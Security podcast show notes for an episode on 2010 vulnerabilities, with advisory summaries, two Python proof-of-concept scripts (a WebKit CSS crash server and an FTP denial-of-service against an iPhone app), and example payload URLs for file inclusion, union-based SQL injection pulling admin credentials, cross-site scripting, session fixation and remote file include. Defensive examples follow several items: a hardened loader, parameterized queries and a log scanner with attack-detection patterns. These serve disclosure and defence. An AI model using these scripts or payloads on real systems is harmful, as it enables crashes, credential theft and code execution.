Your daily source of Pwnage, Policy and Politics.


Episode 75 – “Zipit, Zipit Good”


ISD Podcast Episode 75 for February 25, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:

Friends of the Podcast:
Webhosting services: WebSpeedway

Vulnerabilities of Interest:

  1. WebKit is subject to a remote memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. The following are vulnerable: Apple Safari 4.0.4, Apple Safari for the iPhone and iPod Touch and Google Chrome 4.0.249. Other versions of those browsers or other applications built using WebKit may also be affected.
    #!/usr/bin/python
    #greetz to my blackhatz and baycatz
    #iPhone CSS::Selector crash
    #this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
    #this is a remote crash bug, however an analysis of the debug dump shows remote code execution capability, I am just lazy

    import sys, socket

    def main():
        # 120000 copies of the selector fragment "*>" form the malformed string
        junk = "*>" * 120000

        html = """
        <html>
        <head>
        <style>
        """

        html += junk

        html += """
        body {background: blue;}
        </style>
        </head>
        </html>
        """

        # listen on all interfaces, TCP port 2121, and serve the page to any client that connects
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('', 2121))
        s.listen(1)

        while True:
            channel, details = s.accept()
            print channel.recv(1024)
            channel.send(html)
            channel.close()

    main()

  2. OpenInferno OI.Blogs is subject to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected. Example URLs are available:

    http://www.sample.com/templates/loadStyles.php?theme=file%00

    http://www.sample.com/sources/javascript/loadScripts.php?scripts=[file]%00

    The following example data is available:

    javascript:document.cookie="installerFile=[FIle];path='/upload/admin/plugins'
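The loadStyles.php case above is the classic file-include shape: a request parameter is joined to a path and read without validation, and the trailing %00 exists only to cut off whatever suffix older PHP releases appended before opening the file. The following is an added example, not OI.Blogs code: a Python theme loader written the vulnerable way next to a hardened one that whitelists the name, appends a fixed suffix, and confines the resolved path to the template directory. The directory layout, file names and the "config.php" secret are constructed for the demo; Python 3 refuses embedded NUL bytes in paths on its own, so the demo concentrates on the traversal the NUL byte enabled.

```python
import os
import re
import tempfile

# Theme names are short identifiers; anything else is rejected before it touches the filesystem.
THEME_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def load_theme_vulnerable(base_dir, theme):
    """Joins the request parameter to the base directory and reads it as-is.
    "../" sequences walk out of the directory, exactly as in the page's example."""
    with open(os.path.join(base_dir, theme)) as fh:
        return fh.read()


def load_theme_safe(base_dir, theme):
    """Whitelist the name, add the suffix server-side, then confine the resolved path."""
    if "\x00" in theme or not THEME_NAME.fullmatch(theme):
        raise ValueError("invalid theme name")
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, theme + ".css"))
    # Second line of defence: even if the whitelist were loosened later, the
    # canonical path must still sit under the template directory.
    if os.path.commonpath([base, path]) != base:
        raise ValueError("theme path escapes the template directory")
    with open(path) as fh:
        return fh.read()


def outcome(func, base_dir, theme):
    """Run a loader and report either the file contents or the rejection."""
    try:
        return func(base_dir, theme)
    except (ValueError, OSError) as exc:
        return "rejected: " + exc.__class__.__name__


def demo():
    """Build a constructed layout (templates/blue.css plus a secret one level up)
    and compare both loaders on a normal request, a traversal and a NUL byte."""
    with tempfile.TemporaryDirectory() as root:
        templates = os.path.join(root, "templates")
        os.mkdir(templates)
        with open(os.path.join(templates, "blue.css"), "w") as fh:
            fh.write("body {background: blue;}")
        with open(os.path.join(root, "config.php"), "w") as fh:
            fh.write("<?php $db_pass = 'constructed-secret'; ?>")  # constructed secret
        return {
            "vuln_normal": outcome(load_theme_vulnerable, templates, "blue.css"),
            "vuln_traversal": outcome(load_theme_vulnerable, templates, "../config.php"),
            "safe_normal": outcome(load_theme_safe, templates, "blue"),
            "safe_traversal": outcome(load_theme_safe, templates, "../config"),
            "safe_nul": outcome(load_theme_safe, templates, "blue\x00"),
        }


if __name__ == "__main__":
    for case, result in demo().items():
        print(case, "->", result)
```

The whitelist does the real work; the realpath/commonpath check is there so that a later relaxation of the name rule (say, to allow subdirectories) cannot silently reopen traversal.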

  3. Softbiz Auktios is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example URLs are available:

    http://www.sample.com/auktionscript/view_items.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin

    http://www.sample.com/auktionscript/store_info.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3a,pwd),18+from+sbauctions_admin#
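The view_items.php URL above works because the id value is pasted into the SQL text, so "null union select ..." turns a one-table lookup into a read of the admin table. Here is an added example, not Softbiz code, that reproduces that mechanism against a constructed SQLite database and puts the parameterized version beside it. The items table, the credential row and the column layout are made up; the table name sbauctions_admin is taken from the page, and SQLite's || operator stands in for MySQL's concat().

```python
import sqlite3


def build_db():
    """Constructed schema: a public items table and the admin table the payload reads."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE items (id INTEGER, title TEXT, price REAL);
        CREATE TABLE sbauctions_admin (admin_name TEXT, pwd TEXT);
        INSERT INTO items VALUES (1, 'Lamp', 12.5), (2, 'Chair', 40.0);
        INSERT INTO sbauctions_admin VALUES ('admin', 'constructed-hash');
        """
    )
    return conn


def view_item_vulnerable(conn, item_id):
    """String concatenation: the parameter becomes part of the statement text."""
    sql = "SELECT id, title, price FROM items WHERE id = " + item_id
    return conn.execute(sql).fetchall()


def view_item_safe(conn, item_id):
    """Type check first, then bind the value; it can never alter the statement's shape."""
    try:
        value = int(item_id)
    except ValueError:
        return []  # non-numeric ids are rejected outright
    sql = "SELECT id, title, price FROM items WHERE id = ?"
    return conn.execute(sql, (value,)).fetchall()


# Same shape as the page's payload, trimmed to this table's three columns.
UNION_PAYLOAD = "null UNION SELECT 1, admin_name || ':' || pwd, 3 FROM sbauctions_admin"


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, id=2      ->", view_item_vulnerable(db, "2"))
    print("vulnerable, payload   ->", view_item_vulnerable(db, UNION_PAYLOAD))
    print("parameterized, id=2   ->", view_item_safe(db, "2"))
    print("parameterized, payload->", view_item_safe(db, UNION_PAYLOAD))
```

The column count in the payload (1,2,...,18 on the page, three here) has to match the original SELECT; that is why the public exploit URLs enumerate so many placeholder columns. Binding the value removes the problem entirely, and the int() check on top means the application never even sends a non-numeric id to the database.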

  4. EMC HomeBase Server is subject to a remote code-execution vulnerability because it fails to properly sanitize user-supplied data. An attacker can exploit this issue to overwrite arbitrary files and execute arbitrary code with the privileges of the service. Attackers can use standard tools to exploit this issue.
  5. SavySoda WiFiFTP is subject to a remote denial-of-service vulnerability. Successful exploits may allow an attacker to prevent users from accessing files on the FTP server, resulting in a denial-of-service condition. SavySoda WiFiFTP 1 is vulnerable; other versions may also be affected.

    #!/usr/bin/python
    #
    # Title: iPhone - FTP Server (WiFi FTP) by SavySoda DoS/PoC
    # Date: 02-18-2010
    # Author: b0telh0
    # Link: app store (http://itunes.apple.com/br/app/ftp-server/id346724641?mt=8)
    # Tested on: iPhone 3G (firmware 3.1.3)

    # The server doesn't crash at all, but after exploiting it
    # you can't see (list) your files anymore. You must close the app
    # and open it again. Then you'll see that the app starts as if it were
    # freshly installed and your files are gone.

    # root@bt:~# ./free_ftp.py 192.168.1.108
    #
    # [+] iPhone - FTP Server by SavySoda(WiFi FTP).
    # [+] Free version of WiFi FTP with Ad Support.
    #
    # [+] Connecting...
    # [+] 220 Service ready.
    #
    # [+] Sending username...
    # [+] Sending buffer...
    # [+] done!

    # root@bt:~# ftp 192.168.1.108
    # Connected to 192.168.1.108.
    # 220 Service ready.
    # Name (192.168.1.108:root): anonymous
    # 230 User logged in, proceed.
    # Remote system type is UNIX.
    # Using binary mode to transfer files.
    # ftp> ls
    # 200 Command okay.
    # 450 Requested file action not taken. File unavailable (e.g., file busy).
    # ftp> ls
    # 421 Service not available, closing control connection.
    # ftp> ls
    # Not connected.
    # ftp> bye

    import socket
    import sys
    import time

    # 1000 bytes of "A" used as the APPE argument
    crash = "\x41" * 1000

    def Usage():
        print ("Usage: ./free_ftp.py serv_ip\n")

    if len(sys.argv) <> 2:
        Usage()
        sys.exit(1)
    else:
        host = sys.argv[1]
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            print "\n[+] FTP Server by SavySoda(WiFi FTP)."
            print "[+] Free version of WiFi FTP with Ad Support.\n"
            print "[+] Connecting..."
            s.connect((host, 21))
            b = s.recv(1024)
            print "[+] " + b
        except:
            print ("[-] Can't connect to ftp server!\n")
            sys.exit(1)
        print "[+] Sending username..."
        time.sleep(3)
        s.send('USER anonymous\r\n')
        s.recv(1024)
        print "[+] Sending buffer..."
        time.sleep(3)
        s.send('APPE ' + crash + '\r\n')
        s.recv(1024)
        s.close()
        print "[+] done!\n"
        sys.exit(0)

  6. Squid Web Proxy Cache is subject to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. An attacker may use readily available networking tools to exploit this issue.
  7. WikyBlog is subject to multiple vulnerabilities, including an arbitrary-file-upload issue, a cross-site scripting issue, a remote file-include issue, and a session-fixation issue. Attackers can exploit these issues to run arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials; upload arbitrary PHP scripts and run them in the context of the webserver; compromise the application and the underlying system; and hijack a user's session and gain unauthorized access to the affected application. WikyBlog 1.7.3rc2 is vulnerable; other versions may also be affected. Example URLs are available:

    File upload:

    http://www.sample.com/Wiky/index.php/Attach/(your name)?cmd=uploadform

    Cross-site scripting:

    http://www.sample.com/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=http://www.example.com/HomeComputer.jpg+onload=alert(213771818860)>

    Session fixation:

    http://www.sample.com/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

    Remote file include:

    http://www.sample.com/Wiky/include/WBmap.php?langFile=http://www.example2.com/c.txt?
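The example URLs in items 2, 3 and 7 all leave a distinctive mark in a web server's access log: a NUL byte or "../" in a file parameter, "union select" in a query string, a jsessionid carried in the path, an http:// URL handed to an include parameter, and an HTML tag in a parameter value. As an added example that is not part of the show notes or of any of the affected projects, the scanner below parses Common Log Format lines, URL-decodes the request target and tags each line with the patterns it matches. The log lines, client addresses and timestamps are constructed for the demo; the rules are illustrative signatures, not a complete ruleset.

```python
import re
import urllib.parse
from collections import defaultdict

# Constructed access-log lines modelled on the example URLs above (hosts and times are made up).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Feb/2010:10:01:02 +0000] "GET /templates/loadStyles.php?theme=blue HTTP/1.1" 200 512
203.0.113.5 - - [25/Feb/2010:10:01:09 +0000] "GET /templates/loadStyles.php?theme=../../etc/passwd%00 HTTP/1.1" 200 1422
203.0.113.7 - - [25/Feb/2010:10:02:15 +0000] "GET /auktionscript/view_items.php?id=null+union+select+1,2,concat(admin_name,0x3a,pwd)+from+sbauctions_admin HTTP/1.1" 200 8801
203.0.113.9 - - [25/Feb/2010:10:03:40 +0000] "GET /Wiky/index.php/Comment/Main/;jsessionid=constructedfixedid HTTP/1.1" 200 3300
203.0.113.9 - - [25/Feb/2010:10:03:41 +0000] "GET /Wiky/include/WBmap.php?langFile=http://198.51.100.20/c.txt? HTTP/1.1" 200 120
203.0.113.9 - - [25/Feb/2010:10:03:50 +0000] "GET /Wiky/index.php/Special/Main/Templates?cmd=copy&which=%3Cimg+src%3Dx+onload%3Dalert(1)%3E HTTP/1.1" 200 2210
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD target PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Signatures applied to the URL-decoded target; each is a simplification of the shapes on the page.
RULES = [
    ("lfi", re.compile(r"\.\./|\x00")),                           # traversal or NUL-byte truncation
    ("sqli", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),     # union-based injection
    ("rfi", re.compile(r"=[^&]*https?://", re.I)),                 # parameter value is a remote URL
    ("xss", re.compile(r"<\s*(script|img|svg|iframe)\b|\bon(load|error|mouseover|click|focus)\s*=", re.I)),
    ("session_fixation", re.compile(r";jsessionid=", re.I)),       # session id supplied in the path
]


def parse_line(line):
    """Return the parsed fields of one CLF line (with a decoded target), or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode once so %00, %3C and '+' are matched in their real form, not as escapes.
    rec["decoded"] = urllib.parse.unquote_plus(rec["target"])
    return rec


def scan(log_text):
    """Return (ip, decoded target, [matched rule names]) for every line that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [name for name, pat in RULES if pat.search(rec["decoded"])]
        if hits:
            findings.append((rec["ip"], rec["decoded"], hits))
    return findings


def summarize(findings):
    """Collapse findings to one sorted list of rule names per client address."""
    by_ip = defaultdict(set)
    for ip, _target, hits in findings:
        by_ip[ip].update(hits)
    return {ip: sorted(cats) for ip, cats in by_ip.items()}


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for ip, target, hits in results:
        print(ip, hits, repr(target))
    print(summarize(results))
```

Decoding before matching matters: the first loadStyles.php line on the page hides its NUL byte behind %00 and the WikyBlog payload hides its tag behind %3C, so a rule run on the raw target would miss both. Expect false positives from the rfi rule on legitimate redirect parameters that carry full URLs; in practice you would scope it to the include-style parameter names your applications actually use.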

News Items of Interest:
News item 1: http://www.newsweek.com/id/233916

There is no doubt that real-time or historical tracking of criminals' movements via their cell phones can come in really handy to law enforcement officers. It is certain that most of them – if not all – would like to avail themselves of this opportunity to gain information that aids their investigations.
According to Newsweek, some of them have. Federal magistrates around the country were asked to sign off on warrants that would allow law enforcement agencies to use cellphones as tracking devices. But some magistrates in New York, Pennsylvania, and Texas haven't been that forthcoming and refused to sign such requests, not being convinced of their legality.

http://cryptome.org/isp-spy/microsoft-spy.zip

News item 2: http://news.slashdot.org/story/10/02/21/2329249/Windows-7-Memory-Usage-Critic-Outed-As-Fraud
A few days ago, a report came out alleging that Windows 7 consumed more memory than it should, based on a report from Devil Mountain Software; a followup post linked to Ars Technica's robust deconstruction of that claim. Now the story gets weird: Fred Flowers writes
“The original story quoted the company's CTO, Craig Barth, on the issue. Now, InfoWorld editor in chief Eric Knorr has still more to add. From Knorr's blog at InfoWorld.com: ‘On Friday, Feb. 19, we discovered that one of our contributors, Randall C. Kennedy, had been misrepresenting himself to other media organizations as Craig Barth, CTO of Devil Mountain Software (aka exo.performance.network), in interviews for a number of stories regarding Windows and other Microsoft software topics. … There is no Craig Barth.’ Knorr's post goes on to say that Kennedy has been fired from his blogging gig at InfoWorld over this ‘serious breach of trust,’ and that his blog will be removed.”

Technical Segment:
http://www.irongeek.com/i.php?page=security/zipit-z2-hacking-userland-side-track

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.